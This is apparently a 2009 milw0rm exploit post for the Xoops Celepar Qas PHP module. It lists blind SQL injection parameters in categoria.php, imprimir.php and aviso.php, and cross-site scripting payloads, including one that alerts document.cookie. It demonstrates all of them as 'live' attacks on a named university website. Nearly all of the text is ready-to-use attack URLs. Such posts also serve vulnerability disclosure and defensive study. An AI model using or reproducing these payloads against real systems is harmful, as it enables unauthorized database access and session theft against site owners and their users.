###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################

==============================================================================
                      _      _       _          _      _   _ 
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
                                                             

==============================================================================
        [Â»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
==============================================================================
        [Â»] Xoops Celepar Module Qas (bSQL/XSS) Multiple Remote Vulnerabilities
==============================================================================

	[Â»] Script:             [ Xoops Celepar Module Qas ]
	[Â»] Language:           [ PHP ]
        [Â»] Download:           [ http://www.xoops.pr.gov.br/uploads/core/xoopscelepar.tar.gz  ]
	[Â»] Founder:            [ Moudi <m0udi@9.cn> ]
        [Â»] Thanks to:          [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]
        [Â»] Team:               [ EvilWay ]
        [Â»] Dork:               [ OFF ]
        [Â»] Price:              [ FREE ]
        [Â»] Site :              [ https://security-shell.ws/forum.php ]

###########################################################################

===[ Exploit + LIVE : BLIND SQL INJECTION vulnerability ]===	
	
[Â»] http://www.site.com/patch/categoria.php?cod_categoria=[BLIND]
[Â»] http://www.site.com/patch/imprimir.php?codigo=[BLIND]
[Â»] http://www.site.com/patch/aviso.php?codigo=[BLIND]

[Â»] http://www.dce.uem.br/modules/qas/categoria.php?cod_categoria=1 and 1=1 <= TRUE
[Â»] http://www.dce.uem.br/modules/qas/categoria.php?cod_categoria=1 and 1=2 <= FALSE

[Â»] http://www.dce.uem.br/modules/qas/imprimir.php?codigo=1 and 1=1 <= TRUE
[Â»] http://www.dce.uem.br/modules/qas/imprimir.php?codigo=1 and 1=2 <= FALSE

[Â»] http://www.dce.uem.br/modules/qas/aviso.php?codigo=1 and 1=1 <= TRUE
[Â»] http://www.dce.uem.br/modules/qas/aviso.php?codigo=1 and 1=2 <= FALSE

===[ Exploit XSS + LIVE : vulnerability ]===

[Â»] http://www.site.com/patch/categoria.php?cod_categoria=[XSS]
[Â»] http://www.site.com/patch/index.php?opcao=[XSS]
[Â»] http://www.site.com/patch/categoria.php/[XSS]
[Â»] http://www.site.com/patch/index.php/[XSS]

[Â»] http://www.dce.uem.br/modules/qas/categoria.php?cod_categoria="><script>alert(document.cookie);</script>
[Â»] http://www.dce.uem.br/modules/qas/index.php?opcao=1>'><ScRiPt %0A%0D>alert(439286918587)%3B</ScRiPt>
[Â»] http://www.dce.uem.br/modules/qas/categoria.php/>'><ScRiPt>alert(665068655391)</ScRiPt>
[Â»] http://www.dce.uem.br/modules/qas/index.php/>'><ScRiPt>alert(657988605523)</ScRiPt>

Author: Moudi

###########################################################################

# milw0rm.com [2009-07-27]